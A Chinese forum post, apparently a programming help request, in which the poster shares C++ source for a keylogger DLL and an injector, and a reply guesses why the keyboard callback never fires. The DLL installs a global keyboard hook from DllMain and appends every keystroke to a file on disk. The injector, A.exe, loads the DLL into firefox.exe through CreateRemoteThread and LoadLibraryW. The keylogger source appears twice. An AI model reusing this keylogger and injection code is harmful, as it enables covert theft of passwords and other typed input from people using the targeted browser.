该DLL在我使用普通客户程序加载后 hook的情况十分正常
但我将其注入其他进程进行调用时 根据测试 发现无法进入回调
其代码如下:
// hookdll.cpp : Defines the entry point for the DLL application.
//
//说明
//需要删除stdafx.h中#include "windows.h"
//工程-设置-常规-使用mfc作为共享的dll
//工程-设置-c-预处理器定义为:WIN32,_DEBUG,_WINDOWS,_MBCS,HOOKDLL_EXPORTS,_WINDLL,_AFXDLL
//工程-设置-c-code gerneration:debug multithreaded dll
#include "stdafx.h"
#include <afx.h>void WINAPI InstallhookdllEv();
HHOOK Hook;
LRESULT CALLBACK LauncherHook(int nCode,WPARAM wParam,LPARAM lParam);
void SaveFile(char *s);
DWORD WINAPI MainThread(LPVOID lpParameter);BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
CreateThread(NULL,0,MainThread,0,0,0);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}DWORD WINAPI MainThread(LPVOID lpParameter)
{
InstallhookdllEv();
return true;
}void WINAPI InstallhookdllEv()
{
Hook=(HHOOK)SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)LauncherHook,NULL,0);
MSG msg;
while(GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
MessageBox(NULL,"已经启动SetWindowsHookEx","",0);
}LRESULT CALLBACK LauncherHook(int nCode,WPARAM wParam,LPARAM lParam)
{
MessageBox(NULL,"已经启动LauncherHook","",0);
LRESULT Result=CallNextHookEx(Hook,nCode,wParam,lParam);
if(nCode == HC_ACTION && (lParam & 0xc000ffff) == 1)
{
char *sName;
BOOL b_Sft = ::GetAsyncKeyState(VK_SHIFT) >> ((sizeof(short) * 8)-1);
if(b_Sft)
{
switch(wParam)
{
case '1':sName = "!";break;
case '2':sName = "@";break;
case '3':sName = "#";break;
case '4':sName = "$";break;
case '5':sName = "%";break;
case '6':sName = "^";break;
case '7':sName = "&";break;
case '8':sName = "*";break;
case '9':sName = "(";break;
case '0':sName = ")";break;
case VK_SUBTRACT :sName ="怎么";break;
case 'A':sName = "A";break;
case 'B':sName = "B";break;
case 'C':sName = "C";break;
case 'D':sName = "D";break;
case 'E':sName = "E";break;
case 'F':sName = "F";break;
case 'G':sName = "G";break;
case 'H':sName = "H";break;
case 'I':sName = "I";break;
case 'J':sName = "J";break;
case 'K':sName = "K";break;
case 'L':sName = "L";break;
case 'M':sName = "M";break;
case 'N':sName = "N";break;
case 'O':sName = "O";break;
case 'P':sName = "P";break;
case 'Q':sName = "Q";break;
case 'R':sName = "R";break;
case 'S':sName = "S";break;
case 'T':sName = "T";break;
case 'U':sName = "U";break;
case 'V':sName = "V";break;
case 'W':sName = "W";break;
case 'X':sName = "X";break;
case 'Y':sName = "Y";break;
case 'Z':sName = "Z";break;
default: sName = "";break; //容错处理; }
}
else
{
switch(wParam)
{
// 0~9
case '1':sName = "1";break;
case '2':sName = "2";break;
case '3':sName = "3";break;
case '4':sName = "4";break;
case '5':sName = "5";break;
case '6':sName = "6";break;
case '7':sName = "7";break;
case '8':sName = "8";break;
case '9':sName = "9";break;
case '0':sName = "0";break;// A~Z
case 'A':sName = "a";break;
case 'B':sName = "b";break;
case 'C':sName = "c";break;
case 'D':sName = "d";break;
case 'E':sName = "e";break;
case 'F':sName = "f";break;
case 'G':sName = "g";break;
case 'H':sName = "h";break;
case 'I':sName = "i";break;
case 'J':sName = "j";break;
case 'K':sName = "k";break;
case 'L':sName = "l";break;
case 'M':sName = "m";break;
case 'N':sName = "n";break;
case 'O':sName = "o";break;
case 'P':sName = "p";break;
case 'Q':sName = "q";break;
case 'R':sName = "r";break;
case 'S':sName = "s";break;
case 'T':sName = "t";break;
case 'U':sName = "u";break;
case 'V':sName = "v";break;
case 'W':sName = "w";break;
case 'X':sName = "x";break;
case 'Y':sName = "y";break;
case 'Z':sName = "z";break;
//数字键以及一些特殊
case VK_BACK: sName = "~";break;
case VK_RETURN: sName = " ";break;
case VK_SHIFT: sName = "";break;
case VK_CAPITAL:sName = "";break;
case VK_CONTROL:sName = "";break;
case VK_SPACE: sName = " ";break;
case VK_NUMPAD1:sName = "1";break;
case VK_NUMPAD2:sName = "2";break;
case VK_NUMPAD3:sName = "3";break;
case VK_NUMPAD4:sName = "4";break;
case VK_NUMPAD5:sName = "5";break;
case VK_NUMPAD6:sName = "6";break;
case VK_NUMPAD7:sName = "7";break;
case VK_NUMPAD8:sName = "8";break;
case VK_NUMPAD9:sName = "9";break;
case VK_NUMPAD0:sName = "0";break;
case VK_MULTIPLY:sName = "*";break;
case VK_ADD: sName = "+";break;
case VK_SUBTRACT:sName = "-";break;
case VK_DECIMAL: sName = ".";break;
case VK_DIVIDE: sName = "/";break;
default :sName="";break;
}
}
//HWND H_wnd = ::GetForegroundWindow();
//MessageBox(H_wnd,sName,"键盘",MB_OK);
SaveFile(sName);
}
return Result;
}
void SaveFile(char *s)
{
CFile myfile;
if(!myfile.Open("d:\\2.txt",CFile::modeReadWrite))
{
myfile.Open("d:\\2.txt",CFile::modeCreate|CFile::modeReadWrite);
}
myfile.SeekToEnd();
myfile.Write(s,1);
myfile.Close();
}
但我将其注入其他进程进行调用时 根据测试 发现无法进入回调
其代码如下:
// hookdll.cpp : Defines the entry point for the DLL application.
//
//说明
//需要删除stdafx.h中#include "windows.h"
//工程-设置-常规-使用mfc作为共享的dll
//工程-设置-c-预处理器定义为:WIN32,_DEBUG,_WINDOWS,_MBCS,HOOKDLL_EXPORTS,_WINDLL,_AFXDLL
//工程-设置-c-code gerneration:debug multithreaded dll
#include "stdafx.h"
#include <afx.h>void WINAPI InstallhookdllEv();
HHOOK Hook;
LRESULT CALLBACK LauncherHook(int nCode,WPARAM wParam,LPARAM lParam);
void SaveFile(char *s);
DWORD WINAPI MainThread(LPVOID lpParameter);BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
CreateThread(NULL,0,MainThread,0,0,0);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}DWORD WINAPI MainThread(LPVOID lpParameter)
{
InstallhookdllEv();
return true;
}void WINAPI InstallhookdllEv()
{
Hook=(HHOOK)SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)LauncherHook,NULL,0);
MSG msg;
while(GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
MessageBox(NULL,"已经启动SetWindowsHookEx","",0);
}LRESULT CALLBACK LauncherHook(int nCode,WPARAM wParam,LPARAM lParam)
{
MessageBox(NULL,"已经启动LauncherHook","",0);
LRESULT Result=CallNextHookEx(Hook,nCode,wParam,lParam);
if(nCode == HC_ACTION && (lParam & 0xc000ffff) == 1)
{
char *sName;
BOOL b_Sft = ::GetAsyncKeyState(VK_SHIFT) >> ((sizeof(short) * 8)-1);
if(b_Sft)
{
switch(wParam)
{
case '1':sName = "!";break;
case '2':sName = "@";break;
case '3':sName = "#";break;
case '4':sName = "$";break;
case '5':sName = "%";break;
case '6':sName = "^";break;
case '7':sName = "&";break;
case '8':sName = "*";break;
case '9':sName = "(";break;
case '0':sName = ")";break;
case VK_SUBTRACT :sName ="怎么";break;
case 'A':sName = "A";break;
case 'B':sName = "B";break;
case 'C':sName = "C";break;
case 'D':sName = "D";break;
case 'E':sName = "E";break;
case 'F':sName = "F";break;
case 'G':sName = "G";break;
case 'H':sName = "H";break;
case 'I':sName = "I";break;
case 'J':sName = "J";break;
case 'K':sName = "K";break;
case 'L':sName = "L";break;
case 'M':sName = "M";break;
case 'N':sName = "N";break;
case 'O':sName = "O";break;
case 'P':sName = "P";break;
case 'Q':sName = "Q";break;
case 'R':sName = "R";break;
case 'S':sName = "S";break;
case 'T':sName = "T";break;
case 'U':sName = "U";break;
case 'V':sName = "V";break;
case 'W':sName = "W";break;
case 'X':sName = "X";break;
case 'Y':sName = "Y";break;
case 'Z':sName = "Z";break;
default: sName = "";break; //容错处理; }
}
else
{
switch(wParam)
{
// 0~9
case '1':sName = "1";break;
case '2':sName = "2";break;
case '3':sName = "3";break;
case '4':sName = "4";break;
case '5':sName = "5";break;
case '6':sName = "6";break;
case '7':sName = "7";break;
case '8':sName = "8";break;
case '9':sName = "9";break;
case '0':sName = "0";break;// A~Z
case 'A':sName = "a";break;
case 'B':sName = "b";break;
case 'C':sName = "c";break;
case 'D':sName = "d";break;
case 'E':sName = "e";break;
case 'F':sName = "f";break;
case 'G':sName = "g";break;
case 'H':sName = "h";break;
case 'I':sName = "i";break;
case 'J':sName = "j";break;
case 'K':sName = "k";break;
case 'L':sName = "l";break;
case 'M':sName = "m";break;
case 'N':sName = "n";break;
case 'O':sName = "o";break;
case 'P':sName = "p";break;
case 'Q':sName = "q";break;
case 'R':sName = "r";break;
case 'S':sName = "s";break;
case 'T':sName = "t";break;
case 'U':sName = "u";break;
case 'V':sName = "v";break;
case 'W':sName = "w";break;
case 'X':sName = "x";break;
case 'Y':sName = "y";break;
case 'Z':sName = "z";break;
//数字键以及一些特殊
case VK_BACK: sName = "~";break;
case VK_RETURN: sName = " ";break;
case VK_SHIFT: sName = "";break;
case VK_CAPITAL:sName = "";break;
case VK_CONTROL:sName = "";break;
case VK_SPACE: sName = " ";break;
case VK_NUMPAD1:sName = "1";break;
case VK_NUMPAD2:sName = "2";break;
case VK_NUMPAD3:sName = "3";break;
case VK_NUMPAD4:sName = "4";break;
case VK_NUMPAD5:sName = "5";break;
case VK_NUMPAD6:sName = "6";break;
case VK_NUMPAD7:sName = "7";break;
case VK_NUMPAD8:sName = "8";break;
case VK_NUMPAD9:sName = "9";break;
case VK_NUMPAD0:sName = "0";break;
case VK_MULTIPLY:sName = "*";break;
case VK_ADD: sName = "+";break;
case VK_SUBTRACT:sName = "-";break;
case VK_DECIMAL: sName = ".";break;
case VK_DIVIDE: sName = "/";break;
default :sName="";break;
}
}
//HWND H_wnd = ::GetForegroundWindow();
//MessageBox(H_wnd,sName,"键盘",MB_OK);
SaveFile(sName);
}
return Result;
}
void SaveFile(char *s)
{
CFile myfile;
if(!myfile.Open("d:\\2.txt",CFile::modeReadWrite))
{
myfile.Open("d:\\2.txt",CFile::modeCreate|CFile::modeReadWrite);
}
myfile.SeekToEnd();
myfile.Write(s,1);
myfile.Close();
}
/A.exe
#include <stdio.h>
#include <winsock2.h>
#include <tlhelp32.h>
#pragma comment (lib,"Advapi32.lib")int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{ DWORD pid;
HANDLE hSnapshot = NULL;
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL); PROCESSENTRY32 a;
a.dwSize = sizeof(PROCESSENTRY32);
Process32First(hSnapshot,&a);
do
{
if(strcmp(a.szExeFile,"firefox.exe")==0)
{
pid = a.th32ProcessID;
break;
}
}
while(Process32Next(hSnapshot,&a)==TRUE);
CloseHandle (hSnapshot);PWSTR pszLibFileRemote = NULL;
HANDLE hRemoteProcess = NULL;
HANDLE hRemoteThread = NULL;
hRemoteProcess = OpenProcess(
PROCESS_QUERY_INFORMATION |PROCESS_CREATE_THREAD | //允许远程创建线程
PROCESS_VM_OPERATION | // 允许远程VM操作
PROCESS_VM_WRITE, // 允许远程VM写操作
FALSE, pid);
char CurPath[]="J:\\study\\vc\\inject_process_call_dll\\hookdll\\Debug\\hookdll.dll";
int changdu = (strlen(CurPath)+1)*2;
WCHAR wCurPath[256];
MultiByteToWideChar(CP_ACP,0,CurPath,-1,wCurPath,256);
pszLibFileRemote = (PWSTR)VirtualAllocEx(hRemoteProcess, NULL, changdu, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (PVOID) wCurPath, changdu, NULL);PTHREAD_START_ROUTINE pfndizhi = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0, pfndizhi, pszLibFileRemote,0, NULL);
return 0;
}
————————————————————
我觉得是因为你这个指向的地址不在目标进程内,而且远程线程函数有专门的要求
DWORD WINAPI ThreadProc(LPVOID lpParameter)
所以我觉得你根本就没有注入成功,当然也就谈不上回调了